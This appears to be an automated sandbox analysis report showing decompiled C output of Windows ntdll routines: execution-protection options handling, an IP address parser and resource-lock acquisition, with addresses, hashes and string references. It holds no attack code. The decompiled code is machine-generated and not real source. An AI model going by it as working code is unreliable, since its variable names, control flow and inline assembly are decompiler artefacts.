					_t52 = E00840D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						L00883F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00848375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							L00883F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E008AE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					L00883F92();
					_t38 = 1;
					L2:
					return E0083E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                              0x00867f08
                                                              0x00867f0f
                                                              0x00867f12
                                                              0x00867f1b
                                                              0x00867f31
                                                              0x00883ead
                                                              0x00883eb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00883eba
                                                              0x00883ecd
                                                              0x00883ed2
                                                              0x00883ee1
                                                              0x00883ee7
                                                              0x00883eec
                                                              0x00883f12
                                                              0x00883f18
                                                              0x00883f1a
                                                              0x00000000
                                                              0x00000000
                                                              0x00883f20
                                                              0x00883f26
                                                              0x00883f28
                                                              0x00000000
                                                              0x00000000
                                                              0x00883f2e
                                                              0x00883f30
                                                              0x00000000
                                                              0x00000000
                                                              0x00883f3a
                                                              0x00883f3b
                                                              0x00883f53
                                                              0x00883f64
                                                              0x00883f69
                                                              0x00883f6c
                                                              0x00883f6d
                                                              0x00883f6f
                                                              0x0088e304
                                                              0x0088e30f
                                                              0x0088e315
                                                              0x0088e31e
                                                              0x0088e321
                                                              0x0088e327
                                                              0x0088e329
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0088e32f
                                                              0x0088e32f
                                                              0x0088e337
                                                              0x0088e33a
                                                              0x0088e33b
                                                              0x0088e33d
                                                              0x0088e33f
                                                              0x0088e341
                                                              0x0088e341
                                                              0x0088e34e
                                                              0x0088e353
                                                              0x0088e358
                                                              0x0088e35d
                                                              0x0088e35f
                                                              0x00000000
                                                              0x00000000
                                                              0x0088e365
                                                              0x0088e365
                                                              0x0088e368
                                                              0x0088e36e
                                                              0x00000000
                                                              0x00000000
                                                              0x0088e374
                                                              0x0088e32f
                                                              0x00883f75
                                                              0x00883f7a
                                                              0x00883f7c
                                                              0x00883f7e
                                                              0x00883f86
                                                              0x00867f39
                                                              0x00867f47
                                                              0x00867f47
                                                              0x00867f37
                                                              0x00867f37
                                                              0x00000000

                                                              APIs
                                                              • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00883F12
                                                              Strings
                                                              • ExecuteOptions, xrefs: 00883F04
                                                              • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00883EC4
                                                              • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0088E2FB
                                                              • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00883F4A
                                                              • CLIENT(ntdll): Processing section info %ws..., xrefs: 0088E345
                                                              • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00883F75
                                                              • Execute=1, xrefs: 00883F5E
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: BaseDataModuleQuery
                                                              • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                              • API String ID: 3901378454-484625025
                                                              • Opcode ID: 72a2579d566090d7de36a0867bf249bcadb6921fc91b5e0bf1da5c62a7442a79
                                                              • Instruction ID: 60701d01887efd2e15bfa6fd89abd93d53ac3a9d7d0b09f614aea444d887bf5f
                                                              • Opcode Fuzzy Hash: 72a2579d566090d7de36a0867bf249bcadb6921fc91b5e0bf1da5c62a7442a79
                                                              • Instruction Fuzzy Hash: 39419771A8021CBADF20AA94DCC6FDA73BCFB54714F0005A9B605E6181EE709F458BE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00870B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00870B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00848980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							L0083DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00870CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00870CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E008706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E008706BA(_t135, _t178) == 0 || E00870A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00870CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00870CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E008706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E008706BA(_t124, _t142) == 0 || E00870A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                              0x00870b21
                                                              0x00870b24
                                                              0x00870b27
                                                              0x00870b2a
                                                              0x00870b2d
                                                              0x00870b30
                                                              0x00870b33
                                                              0x00870b36
                                                              0x00870b39
                                                              0x00870b3e
                                                              0x00870c65
                                                              0x00870c68
                                                              0x00870c6a
                                                              0x00870c6f
                                                              0x0089eb42
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eb48
                                                              0x0089eb48
                                                              0x00870c75
                                                              0x00870c7a
                                                              0x0089eb54
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eb5a
                                                              0x00870c80
                                                              0x00870c84
                                                              0x0089eb98
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eba6
                                                              0x00870cb8
                                                              0x00870cba
                                                              0x00870cd3
                                                              0x00870cda
                                                              0x00870ce4
                                                              0x00870ce9
                                                              0x00000000
                                                              0x00870cec
                                                              0x00870c8c
                                                              0x0089eb63
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eb70
                                                              0x0089eb75
                                                              0x0089eb7d
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eb8c
                                                              0x00000000
                                                              0x0089eb8c
                                                              0x00870c96
                                                              0x00000000
                                                              0x00000000
                                                              0x00870ca2
                                                              0x00870cac
                                                              0x00870cb4
                                                              0x00000000
                                                              0x00000000
                                                              0x00870b44
                                                              0x00870b47
                                                              0x00870b49
                                                              0x00000000
                                                              0x00000000
                                                              0x00870b4f
                                                              0x00870b50
                                                              0x00000000
                                                              0x00000000
                                                              0x00870b56
                                                              0x00870b62
                                                              0x00870b7c
                                                              0x00870bac
                                                              0x00870a0f
                                                              0x0089eaaa
                                                              0x00000000
                                                              0x0089eac4
                                                              0x0089eac4
                                                              0x00870bd0
                                                              0x00870bd0
                                                              0x00870bd4
                                                              0x00870bd9
                                                              0x00000000
                                                              0x00000000
                                                              0x00870bdb
                                                              0x00870be0
                                                              0x0089eb0e
                                                              0x00870a1a
                                                              0x00000000
                                                              0x00870a1a
                                                              0x0089eb1a
                                                              0x0089eb1f
                                                              0x0089eb27
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eb36
                                                              0x00000000
                                                              0x0089eb36
                                                              0x00870bea
                                                              0x00000000
                                                              0x00000000
                                                              0x00870bf6
                                                              0x00870c00
                                                              0x00870c03
                                                              0x00870c0b
                                                              0x00000000
                                                              0x00870c0b
                                                              0x0089eaaa
                                                              0x00000000
                                                              0x00870a15
                                                              0x00870bb6
                                                              0x00000000
                                                              0x00870bc6
                                                              0x00870bc6
                                                              0x00870bcb
                                                              0x00870c15
                                                              0x00000000
                                                              0x00000000
                                                              0x00870c1d
                                                              0x00870c20
                                                              0x00870c21
                                                              0x00870c24
                                                              0x00870c24
                                                              0x00870c26
                                                              0x00000000
                                                              0x00870c26
                                                              0x00870bcd
                                                              0x00000000
                                                              0x00870bcd
                                                              0x00870b89
                                                              0x00870b89
                                                              0x00870b90
                                                              0x00000000
                                                              0x00000000
                                                              0x00870b96
                                                              0x00000000
                                                              0x00870b96
                                                              0x00870a04
                                                              0x00870a04
                                                              0x00870b9a
                                                              0x00870b9a
                                                              0x00870b9b
                                                              0x00870b9f
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00870ba5
                                                              0x00870ac7
                                                              0x00870aca
                                                              0x0089eacf
                                                              0x00000000
                                                              0x0089eade
                                                              0x0089eade
                                                              0x0089eae3
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eaf3
                                                              0x0089eaf6
                                                              0x0089eaf7
                                                              0x0089eafe
                                                              0x0089eb01
                                                              0x00000000
                                                              0x0089eb01
                                                              0x0089eacf
                                                              0x00870ad0
                                                              0x00870ad4
                                                              0x00000000
                                                              0x00000000
                                                              0x00870ada
                                                              0x00870ae6
                                                              0x00870c34
                                                              0x00000000
                                                              0x00870c47
                                                              0x00870c49
                                                              0x00870c4a
                                                              0x00870c4e
                                                              0x00870c51
                                                              0x00870c54
                                                              0x00870c57
                                                              0x00870c5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00870c60
                                                              0x00870afb
                                                              0x00870afe
                                                              0x00870b02
                                                              0x00870b05
                                                              0x00870b08
                                                              0x00000000
                                                              0x00870b08
                                                              0x00870ae6
                                                              0x00870b44
                                                              0x008709f8
                                                              0x008709f8
                                                              0x008709f9
                                                              0x00000000
                                                              0x00000000
                                                              0x0089eaa0
                                                              0x00000000

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000005.00000002.2122174270.0000000000820000.00000040.00000001.sdmp, Offset: 00810000, based on PE: true
                                                              • Associated: 00000005.00000002.2122164767.0000000000810000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122545369.0000000000900000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122550734.0000000000910000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122555922.0000000000914000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122560469.0000000000917000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122565181.0000000000920000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000005.00000002.2122667326.0000000000980000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: __fassign
                                                              • String ID: .$:$:
                                                              • API String ID: 3965848254-2308638275
                                                              • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction ID: c131e986a3a8ba38aed9f43fbb26d5c88040d5a4a9bc446b955689ebc14da277
                                                              • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                                                              • Instruction Fuzzy Hash: 25A1AC71D0030ADBCF25CF68C8406AEB7B4FB55319F24C46AD44AE724AD630DA41CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00870554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 49%
                                                              			E00870554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009101c0;
									_push(_t144);
									_push(0);
									_t51 = E0082F8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00874FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00883F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00883F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E008B217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00883F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00873915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009101c0;
												_push(_t138);
												_push(0);
												_t58 = E0082F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00874FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00883F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00883F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E008B217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00883F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00873915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00855384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0082F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00873915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0082F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00873915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0082F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00873915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00855329(_t110, _t138);
																return E008553A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                              0x0087055a
                                                              0x0087055d
                                                              0x00870563
                                                              0x00870566
                                                              0x008705d8
                                                              0x008705e2
                                                              0x008705e5
                                                              0x00000000
                                                              0x008705e7
                                                              0x008705e7
                                                              0x008705ea
                                                              0x008705f3
                                                              0x008705f3
                                                              0x00870568
                                                              0x00870568
                                                              0x00870568
                                                              0x00870569
                                                              0x00870569
                                                              0x00870569
                                                              0x0087056b
                                                              0x00000000
                                                              0x00000000
                                                              0x0089217f
                                                              0x00892183
                                                              0x0089225b
                                                              0x0089225f
                                                              0x00892189
                                                              0x0089218c
                                                              0x0089218f
                                                              0x00892194
                                                              0x00892199
                                                              0x0089219d
                                                              0x008921a0
                                                              0x008921a2
                                                              0x008921ce
                                                              0x008921ce
                                                              0x008921ce
                                                              0x008921d0
                                                              0x008921d6
                                                              0x008921de
                                                              0x008921e2
                                                              0x008921e8
                                                              0x008921e9
                                                              0x008921ec
                                                              0x008921f1
                                                              0x008921f6
                                                              0x00000000
                                                              0x00000000
                                                              0x008921f8
                                                              0x008921fb
                                                              0x00892206
                                                              0x0089220b
                                                              0x0089220c
                                                              0x00892217
                                                              0x00892226
                                                              0x0089222b
                                                              0x0089222c
                                                              0x0089222f
                                                              0x00892232
                                                              0x00892235
                                                              0x00892235
                                                              0x0089223a
                                                              0x0089223f
                                                              0x00892241
                                                              0x00892243
                                                              0x00892248
                                                              0x00892248
                                                              0x0089224d
                                                              0x0089224f
                                                              0x00892262
                                                              0x00892263
                                                              0x00892268
                                                              0x00892269
                                                              0x00892269
                                                              0x00892269
                                                              0x0089226d
                                                              0x00000000
                                                              0x00000000
                                                              0x00892276
                                                              0x00892279
                                                              0x0089227e
                                                              0x00892283
                                                              0x00892287
                                                              0x0089228a
                                                              0x0089228d
                                                              0x0089228f
                                                              0x008922bc
                                                              0x008922bc
                                                              0x008922bc
                                                              0x008922be
                                                              0x008922c4
                                                              0x008922cc
                                                              0x008922d0
                                                              0x008922d6
                                                              0x008922d7
                                                              0x008922da
                                                              0x008922df
                                                              0x008922e4
                                                              0x00000000
                                                              0x00000000
                                                              0x008922e6
                                                              0x008922e9
                                                              0x008922f4
                                                              0x008922f9
                                                              0x008922fa
                                                              0x00892305
                                                              0x00892314
                                                              0x00892319
                                                              0x0089231a
                                                              0x0089231d
                                                              0x00892320
                                                              0x00892323
                                                              0x00892323
                                                              0x00892328
                                                              0x0089232d
                                                              0x0089232f
                                                              0x00892331
                                                              0x00892336
                                                              0x00892336
                                                              0x0089233b
                                                              0x0089233d
                                                              0x00892350
                                                              0x00892351
                                                              0x00892356
                                                              0x00892359
                                                              0x00892359
                                                              0x0089235b
                                                              0x0089235d
                                                              0x00855367
                                                              0x0085536b
                                                              0x00855372
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00892363
                                                              0x00892363
                                                              0x00892369
                                                              0x0089236a
                                                              0x0089236c
                                                              0x00892371
                                                              0x00892373
                                                              0x00000000
                                                              0x00892379
                                                              0x00892379
                                                              0x0089237a
                                                              0x0089237f
                                                              0x0089237f
                                                              0x00892385
                                                              0x00892386
                                                              0x00892389
                                                              0x0089238e
                                                              0x00892390
                                                              0x00855378
                                                              0x0085537c
                                                              0x00892396
                                                              0x00892396
                                                              0x00892397
                                                              0x0089239c
                                                              0x008923a2
                                                              0x008923a3
                                                              0x008923a6
                                                              0x008923ab
                                                              0x008923ad
                                                              0x00000000
                                                              0x008923b3
                                                              0x008923b3
                                                              0x008923b4
                                                              0x008923b9
                                                              0x008923ba
                                                              0x008923ba
                                                              0x008923bc
                                                              0x008923bf
                                                              0x00000000
                                                              0x00000000
                                                              0x00889153
                                                              0x00889158
                                                              0x0088915a
                                                              0x0088915e
                                                              0x00889160
                                                              0x00000000
                                                              0x00889166
                                                              0x00889166
                                                              0x00889171
                                                              0x00889176
                                                              0x00889176
                                                              0x00000000
                                                              0x00889160
                                                              0x008923c6
                                                              0x008923d7
                                                              0x008923d7
                                                              0x008923ad
                                                              0x00892390
                                                              0x00892373
                                                              0x0089233f
                                                              0x0089233f
                                                              0x00000000
                                                              0x0089233f
                                                              0x00892291
                                                              0x00892291
                                                              0x00892293
                                                              0x00892295
                                                              0x0089229a
                                                              0x008922a1
                                                              0x008922a3
                                                              0x008922a7
                                                              0x008922a9
                                                              0x00000000
                                                              0x00000000
                                                              0x008922ab
                                                              0x008922ad
                                                              0x008922af
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x008922af
                                                              0x008922b1
                                                              0x008922b4
                                                              0x008922b4
                                                              0x008922b6
                                                              0x008553be
                                                              0x008553be
                                                              0x008553be
                                                              0x008553c0
                                                              0x00000000
                                                              0x00000000
                                                              0x008553cb
                                                              0x008553ce
                                                              0x008553d0
                                                              0x008553d4
                                                              0x008553d6
                                                              0x00000000
                                                              0x008553d8
                                                              0x008553e3
                                                              0x008553ea
                                                              0x008553ea
